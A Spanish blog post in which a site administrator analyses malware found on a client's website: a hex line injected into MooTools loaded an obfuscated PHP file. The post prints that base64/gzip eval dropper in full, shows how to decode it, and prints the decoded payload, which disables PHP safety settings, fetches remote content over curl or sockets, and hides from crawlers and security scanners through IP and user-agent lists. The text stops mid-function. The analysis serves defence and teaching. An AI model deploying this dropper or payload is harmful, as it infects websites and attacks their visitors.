Cuando tienes que administrar diariamente una aplicación web, es importante mantener actualizados todos los módulos o complementos de la aplicación. Si no lo haces, estás corriendo el riesgo de que tu software sea vulnerable a algún ataque y alguien instale un malware que ataque a tus visitantes, como ocurrió en el caso que voy a explicar.

Este caso se me presentó hace meses. La empresa detrás de un sitio web estaba preocupada porque cada vez que entraban en su sitio el antivirus le advertía que alguien había intentado introducir código malicioso en su equipo (Si, amigos, los antivirus sirven para algo). Se me pidió que desinfectara el sitio y intentara averiguar como se introdujo el malware.

Al entrar en la web, se podía ver que el navegador cargaba un archivo PHP de más. La única forma de que esto pase es que ese archivo se cargue por Javascript, así que el siguiente paso fue mirar todo el código fuente de la página y todos los archivos javascript que se cargaban.

Lo que encontré (aunque por desgracia parece que he perdido el archivo) es la librería MooTools con un pequeño añadido. La única diferencia con la libreria original era una linea escrita en hexadecimal (que solo por estar escrita así, ya apestaba bastante a culpable). Al decodificarla, cargaba en el navegador el nombrado archivo PHP, que es el siguiente.

<?php
// Código 1
// La función eval de PHP ejecuta como PHP la cadena que se le pase como argumento.
// http://php.net/manual/es/function.eval.php
$ah_l2r = array("eNrFWW1327YO/r5fo","bo9tX3mOCKpV7vakr","Xpy9q0W5JmbZNcH8W","WHZ3IkifJc9I0//0C","FCnSttLufrqtJVEAi","QcEARBUjHhqdB5Nl+","m4jLN0FN3ERVl02rM","smyVRu9s17gzJNCpi","50ncvXsSBvt5Ht52W","kU4jUbzbBK1eq1sEa","Wjy7CIJnEOrzVrFKf","jZAnPTXp0E40FcRIX","4WUSjSRaAbQwSbLVa","JknoymKbvXa8/CGD1","pybct4HrV77WxZLpb","l6HI5nUZ5nM6ANI/m","WX47SuJ5XMIrcQ7hH","uV5lo+SDDvAfcTfC3","iZxgC8XCRZOMHXDdj","2/wu2dZh9jZMk3LX6","ptEZZ/NFWMZgo6Fxe","PzmwPD65tD4K04n2a","ow3p8YTt/sgolq66K","K2oKAvKuyXAx2d8Gy","8Hu8+xju4kW08Nofj","6NFufMuTGfLcBYNjC","jdWRY9eAz/Dsy+bZ7","n57AUredZmkZ8qQbG","8yQrIqQLnt7E27PL3","Nj9ReC8y8YhDjsfIJ","x8Gxh83Ppg+D197Dp","PHxNCnj72fbhcfEGK","aQsyIebTx7any4L2w","dHRhyN4Os55n1r+ef","/M2fEvzky4QRsfPwP","Xped9YgGB7NCKudUD","uITakqJxHCDaZ3THv","mhg4jCnaZAL4vwmca","gKMxsYzNskakxCUT9","ia2hA9RkQUaAPXEpd","IFGCUzUBgNp4I2gwl","wAN50EpjmAWdjTBWP","CjzMcBRChNCWrumLr","G8OKjBI9LFSZBbIei","0ak0H5Ko5aAhfa4Kg","lnIgf4MFeEm8XEURW","ghHBUlHqrhEz4OLEH","h8uDyURLXnSuFQ02g","8N6UC8KpM1O6AJqWu","NidWlIWv1BDbiGUxU","Azz0W71dPGcYTgBFA","HD+fLbCHL5eJxqQGW","WdKEXAn0OWrjTB1f9","KIonoAjehfgcGtupt","g+0IjO4gtCPMQ0vUY","6h1mnczJb604csagI","4/NwWCfjvM+8LbLfS","LZIoxALcK11itOohN","083maNaLbb3HtLN5w","b9yHisDWzumzD2g46","0ma0SwYuAm1KFMT3N","arHw85aXxXuNTA7Cz","zHozLmMSSIjQ5nOdI","nbbuaMKGoK3dYHqC4","zIRQHt58jVEAolDLb","CJaPIK452OQoWkpjz","TCPRwFM8rjcM05eUT","zyOIRQ7ixgMYDl3fh","0eVVAUkwGjEqHX1BC","c8wPFC5+Xl8o/6YEz","hT2ZarYFYeRU27zoa","iN2VoGHRc7us4P2qh","xpgbCI8udDoAQxqOR","FPzYFTqeJZQmWBmUg","lRRg9BT1oPFcpkCBF","IA23cJGHrFBUQ7KfJ","MkfCvEgvM9zVq/s4D","1cJshfxJILNtZ1nFQ","PHj5M4Snkv2M7hsbh","CCbBV3xpJfJmH+S28","rrJ8ssijAvf+8VWYJ","1lZIuBqtSpKLnJxW1","5lWH+AFBiHlIjLgxf","ohY3b9AYe5SoeR0ml","Rji/rFq3YTqJODeP0","gk8/4nzZcGrmWQV5h","xqFoGWrW8fiyg/7+/","PQOnzwdl5YVz8+i2u","9t//nIU7X/d3vlzc2","b17eO/jBbd2AgUCSj","s6OPxwcjDaf/HiCN5","en5z8Mfp4fHA02n91","8P4EKMfPj978cTJ6+","ebdwfv9wwOg1L9VVb","xA6+BmEYMpBsZxWPY","M6hi/LxMDXNo1THtg","mvAzXh2itHdhUe4cZ","pN4GkeTgQGUFz1jYh","wan43Xg3iAskTP5+H","4KtqBKqXMs2RgpNlO","UWZ51MPWGHk9Y74EY","Xn0T5jEk5DbfmPQIo","MOQBlfB2bPgMWSL9D","1jzyczcNBLQ5Iu/3i","H6zbXoPt2ib8a/MHw","VKQ8jd4wFvrdj4BM6","6gV3YV3/SxSJxOwX2","wtTvdhXuKC9PmRUyb","92yFre4wj8plnhpPw","rMn8cXw/t749Zdnv4","JzGXvxLIXJjZawkKP","wMsvLTp4t00nH/NkE","3964dbvDvSIqR/NwF","o9Hfy+zMipG+TLFwl","aOk32QVhW0OqeqafN","oAUhQ+mqseNrZ2zpO","xGkMnbn94Uxxt6e9d","8SpgottoJMH6PQBOn","uAbj1AR2PcP6g0WKB","WGNpykNPtacbYYLrf","Y3rdnmj5DVxidnvvP","75718Ah35NKaM3FBd","68mkawtRENHnIfJUX","0oGHCBFOUNA1/q0Vb","W6qu8+0f8J3aRsRt7","uGtmWmd539fOjV/NP","GGMeSHxgJDbZ+ix2O","0UH1+Ho87TyDIRyac","n/FJAimf8rjZHo+HQ","dCG+yAfQoOa1ukOeR","sWNVuUlWTagwrfpD0","B09TBopp5mgSweqpu","39avB/r7vjak2TrNe","hKv0pPwyT/qcLvPlI","tSCOVv37aoEMjodg0","y7XpqP2PWuG/q43ia","rtbmBaN4P1aZGY/8Y","qCYxBgPujUJ1K66G4","+CwJiGEDDdO5mjOQN","yNIaR0bS60yIbX/OT","PsxnlmSXYVKNsiolz","KAoeY5NwrFKe3YdHB","TiRC40yIfdaQYZvRx","f1X0hE7WqHi3pQHZQ","ESTEXnSzSLKJku8po","aJL9TiTXnMxFIJ07a","o+tWa+EGJXS1u1jW/","fDNECa8l0bSrNJAkc","4p6TnAAW/gr24MvbN","JxLFJGa7r7bZUMklS","LdoDZ71ddRPuPoPzE","D4aN+3YvK/+ArYIEo","nI/kNpkthZu5jb2lt","7gy/M2g9ergRNoEK6","dd0q8+rwxFD6MftF7","D7AZVr23mUTSN8igf","GOLbTtWtErnZubY56","+oisPjb4bWfQCEPDr","S6w+liCc4rpim6dIe","rqxj4j6ZRVk9SzpKg","gCmsUrFpHMv0HYzTq","RZVrlSNbLkms8WaEK","LsKyOW0EDwNEeVFre","kLjSo4sGqPkhV9/NU","MFvCR6BbQ+QxtS0xV","2qiJQGF3LgFX0gd2K","aikKwudJeGHhLHq3Y","WQa4tKiSwtVGSSvmQ","7WzAfJkNYKZydbYTg","GVqc2vMAI1J/uKhhG","KRf5lQrCajW7Q2usU","2FSOWNJRldb8npHYc","qyf8QVbSaksWttSzN","yGQvityNL7KZBRYTn","cIObxEZuO2P4nK39Y","2fiSIRbSFJo5cTDcI","+Yd0KdxVE1a1ouXXT","dtUTaKayk42U01LNd","W+YStHthWardBsheY","oNEehOQrNUWiOQnMU","mqPQHIXmKDRHobkKz","VVorkJzFZqr0FyF5i","o0V6G5Cs1VaJ5C8xS","ap9A8heYpNE+heQrN","U2ieQvMUmq/QfIXmK","zRfofkKzVdovkLzFZ","qvnSgUGpRXWptobaq","1mda2tLattbVi3HS1","tqe1NVyi4RINl2i4R","MMlGi7RcPVDANFwiY","ZL/Dr7e+tRRKimBtX","UoJoaVFODampoJRah","mhpUU4NqalBt+kzDZ","Rou03CZhss0XKbhap","sNYRou03CZhmtpuJa","Gq+VPYmm4loZrabiW","U5vUDvgespFLiZagi","CWLRVg5McoPynwZDa","dwwg5h7xE5zgiLKqX","CukDKhIplFndagtKq","U6LMiX7Aa+nhJQi51","nZAv7su11NyiZIrCL","VmWm3+A/FGmE4eVUL","qKfpqipvjN0YasPUk","sqyE7s8CuWGyvlP/c","7/3tg2xth/5wwd2nH","w+yqdrWw6nCFNQeXh","kwR7+zXHOv/NIXl3A","UCvAsngS5zWve1cVd","lwZPOQIjh2A6SaqJ5","7J7mo5NvQ06sO+2X3","61GhiEGTExQhVkiP5","ye5qnk0kQVXnliMvP","KMv0yROr+thYBheRO","oqwQGwzJbSWag4FVM","mnzgIv/118A+kjjWa","RGOsW9rhX59nb18lX","8f01Hz7/Gj68fr06P","Tj6cnpyyL+8unzzZv","EXLw9/s198+qUfv5r","lX2ev/z65eSz+YkeJ","Z+pf/3leHb9ifz+8u","Pp6cuP5OjyzfyUHh7","/Pnl7fI1jrPDTn+70","zyBoy1CjTlAbRdY21","A2ejI4Pjk4Pjs5qJp","O1EmlgWpJJvQaurZX","D1NUOYATKAXkwI2t0","t6ZTb43hdbuTOOpIT","X2sucosyVaRML440c","cFfnB6Mnr+4cPbNwd","nYq4XuOwwAn5CHb9O","KFB5YLiKaN27AifTv","wvxLzqbRNI1+rM5fr","9VNPBcIMo31jTMaiJ","CJqywt1l1YmRmAF6m","DpuwFWhYbjV1/qd9E","Z1iVLcxCjdFAfL8uv","ZiGDUUTrzZcdubdW9","nZoO3Vxw4WK0by6vO","pmIgMX5RSw21mQxeY","DxTDKjUwDuahrjkoS","GwKF0tLTF5IGB0QyO","X1bZm4sDGzF3RV5xL","maU4RVQUo5rdbH7Wf","TgJKk3sYKq+DDCmPk","Oit+jHVNirf2zvZk0","sDCskF/HXqKY9k3mu","3maYs1HTaGUucfVvp","NqO7Hq16dxAiDnLYX","Oqv9B//zvxhdGvR8n","Nq4lI+KG1onrBnjxG","MVf7KObp2R7q7n+3A","Hv6Clj1xDwe+9NVHp","f1EojjLPNayPofV2e","NbzXtDRXLD/bW9weu","PH6RHI2ztIxSbWHlI","dSsZli7niATsamvFT","GWWRcxUKzhJrpX5vG","8IymQeEXSFvYDMbzE","EtXLvSwY9rRTZk8OU","Z9AeG6v9nEZn1C2AA","2FSZfbML8KAI88aH7","qnqdNC8CPzMKG1Z+q","fvrpv/1LgwY=");
eval("\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x61\x68\x5F\x6C\x32\x72\x29\x29\x29\x29\x3B");
?>

En general, sólo fijándonos en todos estos caracteres extraños, ya tiene bastante mala pinta. Analizándolo a simple vista, el array $ah_l2r contiene un montón de cadenas de caracteres extraños. Estoy acostumbrado más o menos a tratar con codificaciones, así que ya tenía cierta idea de que eso podría tratarse de una codificación Base64.

Permitidme que os recuerde que codificar no es lo mismo que cifrar. Algo cifrado tiene algún método/clave (o secreto, en general) que hace que una persona que no posee ese secreto sea incapaz de saber lo que se ha cifrado (como por ejemplo el cifrado AES). La codificación es simplemente una forma de expresar algo de una manera diferente (como por ejemplo la codificación binaria, o la Hexadecimal).

Además, la cadena que se le ha pasado a eval es una cadena codificada en Hexadecimal. Vamos a decodificar esa cadena y expresarla en ASCII para que sea legible utilizando esta aplicación web: http://www.dolcevie.com/js/converter.html

// Cadena a decodificar:
65:76:61:6C:28:67:7A:75:6E:63:6F:6D:70:72:65:73:73:28:62:61:73:65:36:34:5F:64:65:63:6F:64:65:28:69:6D:70:6C:6F:64:65:28:22:22:2C:24:61:68:5F:6C:32:72:29:29:29:29:3B

// Cadena decodificada:
eval(gzuncompress(base64_decode(implode("",$ah_l2r))));

// Función implode: Devuelve una cadena con los componentes del array unidos.
// ---------------- http://php.net/manual/es/function.implode.php
// Función base64_decode: Decodifica información en base64.
// ---------------------- http://php.net/manual/es/function.base64-decode.php
// Función gzuncompress: Descomprime una cadena comprimida.
// --------------------- http://php.net/manual/es/function.gzuncompress.php

Empecemos a intentar comprender lo que hace la cadena decodificada. Primero utiliza la función implode sobre $ah_12r para unir todos los componentes de la array en una única cadena de texto. Después decodifica toda esa cadena (que como ya he dicho, estaba en Base64). El resultado de esa operación lo descomprime con gzuncompress, y por último el resultado lo ejecuta como PHP utilizando la función eval. Por lo tanto, el código PHP que de verdad se ejecuta es el resultado de gzuncompress(base64_decode(implode(“”,$ah_l2r))).

Una forma fácil de ver el código que de verdad se ejecuta es partir del código de origen (Codigo 1), decodificar el parámetro de eval que estaba en Hexadecimal, eliminar el primer eval y cambiar el eval que queda por un echo, para que en lugar de ejecutar el resultado se muestre en pantalla. Además, le añadimos el filtro htmlentities, para que si tiene etiquetas HTML o de PHP, que no se interpreten y por lo tanto el código no se ejecute.

<?php
$ah_l2r = array("eNrFWW1327YO/r5fo","bo9tX3mOCKpV7vakr","Xpy9q0W5JmbZNcH8W","WHZ3IkifJc9I0//0C","FCnSttLufrqtJVEAi","QcEARBUjHhqdB5Nl+","m4jLN0FN3ERVl02rM","smyVRu9s17gzJNCpi","50ncvXsSBvt5Ht52W","kU4jUbzbBK1eq1sEa","Wjy7CIJnEOrzVrFKf","jZAnPTXp0E40FcRIX","4WUSjSRaAbQwSbLVa","JknoymKbvXa8/CGD1","pybct4HrV77WxZLpb","l6HI5nUZ5nM6ANI/m","WX47SuJ5XMIrcQ7hH","uV5lo+SDDvAfcTfC3","iZxgC8XCRZOMHXDdj","2/wu2dZh9jZMk3LX6","ptEZZ/NFWMZgo6Fxe","PzmwPD65tD4K04n2a","ow3p8YTt/sgolq66K","K2oKAvKuyXAx2d8Gy","8Hu8+xju4kW08Nofj","6NFufMuTGfLcBYNjC","jdWRY9eAz/Dsy+bZ7","n57AUredZmkZ8qQbG","8yQrIqQLnt7E27PL3","Nj9ReC8y8YhDjsfIJ","x8Gxh83Ppg+D197Dp","PHxNCnj72fbhcfEGK","aQsyIebTx7any4L2w","dHRhyN4Os55n1r+ef","/M2fEvzky4QRsfPwP","Xped9YgGB7NCKudUD","uITakqJxHCDaZ3THv","mhg4jCnaZAL4vwmca","gKMxsYzNskakxCUT9","ia2hA9RkQUaAPXEpd","IFGCUzUBgNp4I2gwl","wAN50EpjmAWdjTBWP","CjzMcBRChNCWrumLr","G8OKjBI9LFSZBbIei","0ak0H5Ko5aAhfa4Kg","lnIgf4MFeEm8XEURW","ghHBUlHqrhEz4OLEH","h8uDyURLXnSuFQ02g","8N6UC8KpM1O6AJqWu","NidWlIWv1BDbiGUxU","Azz0W71dPGcYTgBFA","HD+fLbCHL5eJxqQGW","WdKEXAn0OWrjTB1f9","KIonoAjehfgcGtupt","g+0IjO4gtCPMQ0vUY","6h1mnczJb604csagI","4/NwWCfjvM+8LbLfS","LZIoxALcK11itOohN","083maNaLbb3HtLN5w","b9yHisDWzumzD2g46","0ma0SwYuAm1KFMT3N","arHw85aXxXuNTA7Cz","zHozLmMSSIjQ5nOdI","nbbuaMKGoK3dYHqC4","zIRQHt58jVEAolDLb","CJaPIK452OQoWkpjz","TCPRwFM8rjcM05eUT","zyOIRQ7ixgMYDl3fh","0eVVAUkwGjEqHX1BC","c8wPFC5+Xl8o/6YEz","hT2ZarYFYeRU27zoa","iN2VoGHRc7us4P2qh","xpgbCI8udDoAQxqOR","FPzYFTqeJZQmWBmUg","lRRg9BT1oPFcpkCBF","IA23cJGHrFBUQ7KfJ","MkfCvEgvM9zVq/s4D","1cJshfxJILNtZ1nFQ","PHj5M4Snkv2M7hsbh","CCbBV3xpJfJmH+S28","rrJ8ssijAvf+8VWYJ","1lZIuBqtSpKLnJxW1","5lWH+AFBiHlIjLgxf","ohY3b9AYe5SoeR0ml","Rji/rFq3YTqJODeP0","gk8/4nzZcGrmWQV5h","xqFoGWrW8fiyg/7+/","PQOnzwdl5YVz8+i2u","9t//nIU7X/d3vlzc2","b17eO/jBbd2AgUCSj","s6OPxwcjDaf/HiCN5","en5z8Mfp4fHA02n91","8P4EKMfPj978cTJ6+","ebdwfv9wwOg1L9VVb","xA6+BmEYMpBsZxWPY","M6hi/LxMDXNo1THtg","mvAzXh2itHdhUe4cZ","pN4GkeTgQGUFz1jYh","wan43Xg3iAskTP5+H","4KtqBKqXMs2RgpNlO","UWZ51MPWGHk9Y74EY","Xn0T5jEk5DbfmPQIo","MOQBlfB2bPgMWSL9D","1jzyczcNBLQ5Iu/3i","H6zbXoPt2ib8a/MHw","VKQ8jd4wFvrdj4BM6","6gV3YV3/SxSJxOwX2","wtTvdhXuKC9PmRUyb","92yFre4wj8plnhpPw","rMn8cXw/t749Zdnv4","JzGXvxLIXJjZawkKP","wMsvLTp4t00nH/NkE","3964dbvDvSIqR/NwF","o9Hfy+zMipG+TLFwl","aOk32QVhW0OqeqafN","oAUhQ+mqseNrZ2zpO","xGkMnbn94Uxxt6e9d","8SpgottoJMH6PQBOn","uAbj1AR2PcP6g0WKB","WGNpykNPtacbYYLrf","Y3rdnmj5DVxidnvvP","75718Ah35NKaM3FBd","68mkawtRENHnIfJUX","0oGHCBFOUNA1/q0Vb","W6qu8+0f8J3aRsRt7","uGtmWmd539fOjV/NP","GGMeSHxgJDbZ+ix2O","0UH1+Ho87TyDIRyac","n/FJAimf8rjZHo+HQ","dCG+yAfQoOa1ukOeR","sWNVuUlWTagwrfpD0","B09TBopp5mgSweqpu","39avB/r7vjak2TrNe","hKv0pPwyT/qcLvPlI","tSCOVv37aoEMjodg0","y7XpqP2PWuG/q43ia","rtbmBaN4P1aZGY/8Y","qCYxBgPujUJ1K66G4","+CwJiGEDDdO5mjOQN","yNIaR0bS60yIbX/OT","PsxnlmSXYVKNsiolz","KAoeY5NwrFKe3YdHB","TiRC40yIfdaQYZvRx","f1X0hE7WqHi3pQHZQ","ESTEXnSzSLKJku8po","aJL9TiTXnMxFIJ07a","o+tWa+EGJXS1u1jW/","fDNECa8l0bSrNJAkc","4p6TnAAW/gr24MvbN","JxLFJGa7r7bZUMklS","LdoDZ71ddRPuPoPzE","D4aN+3YvK/+ArYIEo","nI/kNpkthZu5jb2lt","7gy/M2g9ergRNoEK6","dd0q8+rwxFD6MftF7","D7AZVr23mUTSN8igf","GOLbTtWtErnZubY56","+oisPjb4bWfQCEPDr","S6w+liCc4rpim6dIe","rqxj4j6ZRVk9SzpKg","gCmsUrFpHMv0HYzTq","RZVrlSNbLkms8WaEK","LsKyOW0EDwNEeVFre","kLjSo4sGqPkhV9/NU","MFvCR6BbQ+QxtS0xV","2qiJQGF3LgFX0gd2K","aikKwudJeGHhLHq3Y","WQa4tKiSwtVGSSvmQ","7WzAfJkNYKZydbYTg","GVqc2vMAI1J/uKhhG","KRf5lQrCajW7Q2usU","2FSOWNJRldb8npHYc","qyf8QVbSaksWttSzN","yGQvityNL7KZBRYTn","cIObxEZuO2P4nK39Y","2fiSIRbSFJo5cTDcI","+Yd0KdxVE1a1ouXXT","dtUTaKayk42U01LNd","W+YStHthWardBsheY","oNEehOQrNUWiOQnMU","mqPQHIXmKDRHobkKz","VVorkJzFZqr0FyF5i","o0V6G5Cs1VaJ5C8xS","ap9A8heYpNE+heQrN","U2ieQvMUmq/QfIXmK","zRfofkKzVdovkLzFZ","qvnSgUGpRXWptobaq","1mda2tLattbVi3HS1","tqe1NVyi4RINl2i4R","MMlGi7RcPVDANFwiY","ZL/Dr7e+tRRKimBtX","UoJoaVFODampoJRah","mhpUU4NqalBt+kzDZ","Rou03CZhss0XKbhap","sNYRou03CZhmtpuJa","Gq+VPYmm4loZrabiW","U5vUDvgespFLiZagi","CWLRVg5McoPynwZDa","dwwg5h7xE5zgiLKqX","CukDKhIplFndagtKq","U6LMiX7Aa+nhJQi51","nZAv7su11NyiZIrCL","VmWm3+A/FGmE4eVUL","qKfpqipvjN0YasPUk","sqyE7s8CuWGyvlP/c","7/3tg2xth/5wwd2nH","w+yqdrWw6nCFNQeXh","kwR7+zXHOv/NIXl3A","UCvAsngS5zWve1cVd","lwZPOQIjh2A6SaqJ5","7J7mo5NvQ06sO+2X3","61GhiEGTExQhVkiP5","ye5qnk0kQVXnliMvP","KMv0yROr+thYBheRO","oqwQGwzJbSWag4FVM","mnzgIv/118A+kjjWa","RGOsW9rhX59nb18lX","8f01Hz7/Gj68fr06P","Tj6cnpyyL+8unzzZv","EXLw9/s198+qUfv5r","lX2ev/z65eSz+YkeJ","Z+pf/3leHb9ifz+8u","Pp6cuP5OjyzfyUHh7","/Pnl7fI1jrPDTn+70","zyBoy1CjTlAbRdY21","A2ejI4Pjk4Pjs5qJp","O1EmlgWpJJvQaurZX","D1NUOYATKAXkwI2t0","t6ZTb43hdbuTOOpIT","X2sucosyVaRML440c","cFfnB6Mnr+4cPbNwd","nYq4XuOwwAn5CHb9O","KFB5YLiKaN27AifTv","wvxLzqbRNI1+rM5fr","9VNPBcIMo31jTMaiJ","CJqywt1l1YmRmAF6m","DpuwFWhYbjV1/qd9E","Z1iVLcxCjdFAfL8uv","ZiGDUUTrzZcdubdW9","nZoO3Vxw4WK0by6vO","pmIgMX5RSw21mQxeY","DxTDKjUwDuahrjkoS","GwKF0tLTF5IGB0QyO","X1bZm4sDGzF3RV5xL","maU4RVQUo5rdbH7Wf","TgJKk3sYKq+DDCmPk","Oit+jHVNirf2zvZk0","sDCskF/HXqKY9k3mu","3maYs1HTaGUucfVvp","NqO7Hq16dxAiDnLYX","Oqv9B//zvxhdGvR8n","Nq4lI+KG1onrBnjxG","MVf7KObp2R7q7n+3A","Hv6Clj1xDwe+9NVHp","f1EojjLPNayPofV2e","NbzXtDRXLD/bW9weu","PH6RHI2ztIxSbWHlI","dSsZli7niATsamvFT","GWWRcxUKzhJrpX5vG","8IymQeEXSFvYDMbzE","EtXLvSwY9rRTZk8OU","Z9AeG6v9nEZn1C2AA","2FSZfbML8KAI88aH7","qnqdNC8CPzMKG1Z+q","fvrpv/1LgwY=");
// Cadena original
// eval("\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x61\x68\x5F\x6C\x32\x72\x29\x29\x29\x29\x3B");
// Cadena decoficiada
// eval("eval(gzuncompress(base64_decode(implode("",$ah_l2r))))");
// Cadena modificada final
// Cuidado con las "" de la función implode, que hay que escaparlas.
echo htmlentities(gzuncompress(base64_decode(implode("",$ah_l2r))));
?>

El resultado de ejecutar este código, es el siguiente:

<?php if (!function_exists('google')) { function google($i){$a=Array("safe_mode","open_basedir","safe_mode_include_dir","safe_mode_exec_dir","disable_functions","allow_url_fopen",'max_execution_time','output_buffering','memory_limit','16M','error_log','log_errors','file_uploads','allow_url_fopen','max_execution_time','output_buffering','memory_limit','16M','error_log','log_errors','file_uploads','allow_url_fopen',"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)",'safe_mode','open_basedir',"http://","","#/#","/","","","/","/","Accept-Language: en-us, en;q=0.50\r\n","Connection: Close\r\n\r\n","\r\n\r\n","\n","<br />","","/Location\:/","Location: ","\r","\r\n\r\n","","&#76&#111&#99&#97&#116&#105&#111&#110&#58","Location:","ERROR","66\.249\.[6-9][0-9]\.[0-9]+","72\.14\.[1-2][0-9][0-9]\.[0-9]+","74\.125\.[0-9]+\.[0-9]+","65\.5[2-5]\.[0-9]+\.[0-9]+","74\.6\.[0-9]+\.[0-9]+","67\.195\.[0-9]+\.[0-9]+","72\.30\.[0-9]+\.[0-9]+","38\.[0-9]+\.[0-9]+\.[0-9]+","124\.115\.6\.[0-9]+","93\.172\.94\.227","212\.100\.250\.218","71\.165\.223\.134","209\.9\.239\.101","67\.217\.160\.[0-9]+","70\.91\.180\.25","65\.93\.62\.242","74\.193\.246\.129","213\.144\.15\.38","195\.92\.229\.2","70\.50\.189\.191","218\.28\.88\.99","165\.160\.2\.20","89\.122\.224\.230","66\.230\.175\.124","218\.18\.174\.27","65\.33\.87\.94","67\.210\.111\.241","81\.135\.175\.70","64\.69\.34\.134","89\.149\.253\.169","64\.233\.1[6-8][1-9]\.[0-9]+","64\.233\.19[0-1]\.[0-9]+","209\.185\.108\.[0-9]+","209\.185\.253\.[0-9]+","209\.85\.238\.[0-9]+","216\.239\.33\.9[6-9]","216\.239\.37\.9[8-9]","216\.239\.39\.9[8-9]","216\.239\.41\.9[6-9]","216\.239\.45\.4","216\.239\.46\.[0-9]+","216\.239\.51\.9[6-9]","216\.239\.53\.9[8-9]","216\.239\.57\.9[6-9]","216\.239\.59\.9[8-9]","216\.33\.229\.163","64\.233\.173\.[0-9]+","64\.68\.8[0-9]\.[0-9]+","64\.68\.9[0-2]\.[0-9]+","72\.14\.199\.[0-9]+","8\.6\.48\.[0-9]+","207\.211\.40\.82","67\.162\.158\.146","66\.255\.53\.123","24\.200\.208\.112","129\.187\.148\.240","129\.187\.148\.244","199\.126\.151\.229","118\.124\.32\.193","89\.149\.217\.191","122\.164\.27\.42","149\.5\.168\.2","150\.70\.66\.[0-9]+","194\.250\.116\.39","208\.80\.194\.[0-9]+","62\.190\.39\.205","67\.198\.80\.236","85\.85\.187\.243","95\.134\.141\.250","97\.107\.135\.[0-9]+","184\.168\.191\.[0-9]+","95\.108\.157\.[0-9]+","209\.235\.253\.17",'http','google','slurp','msnbot','bot','crawl','spider','robot','httpclient','curl','php','indy library','wordpress','charlotte','wwwster','python','urllib','perl','libwww','lynx','twiceler','rambler','yandex','trend','virus','malware','wget',"|User\.Agent\:[\s ]?|i","","^[a-zA-Z]{5,}",".","..",'langs','REMOTE_ADDR','HTTP_USER_AGENT','SCRIPT_FILENAME','','','','windows','Expires: Sat, 26 Jul 1997 05:00:00 GMT','Last-Modified: ','D, d M Y H:i:s',' GMT','Cache-Control: no-store, no-cache, must-revalidate','Cache-Control: post-check=0, pre-check=0','Pragma: no-cache','/.svn',"Hi",'0000','0001','1200','1201',"ymd","w",'ohix.','effbot.','/f/','net','ERROR',"w","a");return $a[$i];}} ?><?php @ignore_user_abort(round(0+0.25+0.25+0.25+0.25));@set_magic_quotes_runtime(round(0));@set_time_limit(round(0));@error_reporting(round(0));if(@function_exists('ini_restore')){@ini_restore(google(0));@ini_restore(google(1));@ini_restore(google(2));@ini_restore(google(3));@ini_restore(google(4));@ini_restore(google(5));}if(@function_exists('ini_set')){@ini_set(google(6),round(0));@ini_set(google(7),round(0));@ini_set(google(8),google(9));@ini_set(google(10),NULL);@ini_set(google(11),round(0));@ini_set(google(12),round(0+0.2+0.2+0.2+0.2+0.2));@ini_set(google(13),round(0+0.25+0.25+0.25+0.25));}elseif(@function_exists('ini_alter')){@ini_alter(google(14),round(0));@ini_alter(google(15),round(0));@ini_alter(google(16),google(17));@ini_alter(google(18),NULL);@ini_alter(google(19),round(0));@ini_alter(google(20),round(0+0.25+0.25+0.25+0.25));@ini_alter(google(21),round(0+0.25+0.25+0.25+0.25));}if(!function_exists('cc')){function cc($bot_0){$bot_1=google(22);if(function_exists('curl_init')){$bot_2=curl_init();curl_setopt($bot_2,10002,$bot_0);curl_setopt($bot_2,42,round(0));curl_setopt($bot_2,13,round(0+7.5+7.5+7.5+7.5));curl_setopt($bot_2,19913,round(0+0.25+0.25+0.25+0.25));curl_setopt($bot_2,10018,$bot_1);if(!(@ini_get(google(23))||@ini_get(google(24)))){@curl_setopt($bot_2,52,round(0+1));}@curl_setopt($bot_2,68,round(0+0.4+0.4+0.4+0.4+0.4));$bot_3=curl_exec($bot_2);curl_close($bot_2);if($bot_3 !== false){return $bot_3;}}else if(function_exists('fsockopen')){global $bot_4;$bot_0=str_replace(google(25),google(26),$bot_0);if(preg_match(google(27),"$bot_0")){$bot_5=$bot_0;$bot_0=@explode(google(28),$bot_0);$bot_0=$bot_0[round(0)];$bot_5=str_replace($bot_0,google(29),$bot_5);if(!$bot_5 || $bot_5 == google(30)){$bot_5=google(31);}$bot_6=gethostbyname($bot_0);}else{$bot_6=gethostbyname($bot_0);$bot_5=google(32);}$bot_7=fsockopen($bot_6,round(0+16+16+16+16+16),$bot_8,$bot_9,round(0+2+2+2+2+2));stream_set_timeout($bot_7,round(0+2+2+2+2+2));if($bot_7){$bot_10="GET $bot_5 HTTP/1.0\r\n";$bot_10 .="Host: $bot_0\r\n";$bot_10 .="Referer: http://$bot_0$bot_5\r\n";$bot_10 .= google(33);$bot_10 .="User-Agent: $bot_1\r\n";$bot_10 .= google(34);fputs($bot_7,$bot_10);while(!feof($bot_7)){$bot_11 .= fgets($bot_7,round(0+4096));}fclose($bot_7);$bot_11=@explode(google(35),$bot_11,round(0+2));$bot_12=$bot_11[round(0)];if($bot_4){$bot_12="$bot_4<br /><br />\n$bot_12";}$bot_12=str_replace(google(36),google(37),$bot_12);if($bot_11[round(0+0.2+0.2+0.2+0.2+0.2)]){$bot_13=$bot_11[round(0+1)];}else{$bot_13=google(38);}if($bot_13){$bot_11=$bot_13;}else{$bot_11=$bot_12;}if(preg_match(google(39),"$bot_12")){$bot_0=@explode(google(40),$bot_12);$bot_0=$bot_0[round(0+0.25+0.25+0.25+0.25)];$bot_0=@explode(google(41),$bot_0);$bot_0=$bot_0[round(0)];$bot_4=str_replace(google(42),google(43),$bot_12);$bot_14=google(44);$bot_4=str_replace(google(45),$bot_14,$bot_4);return cc($bot_0);}else{return $bot_11;}}}else{echo google(46);exit;}}}if(!function_exists('detB')){function 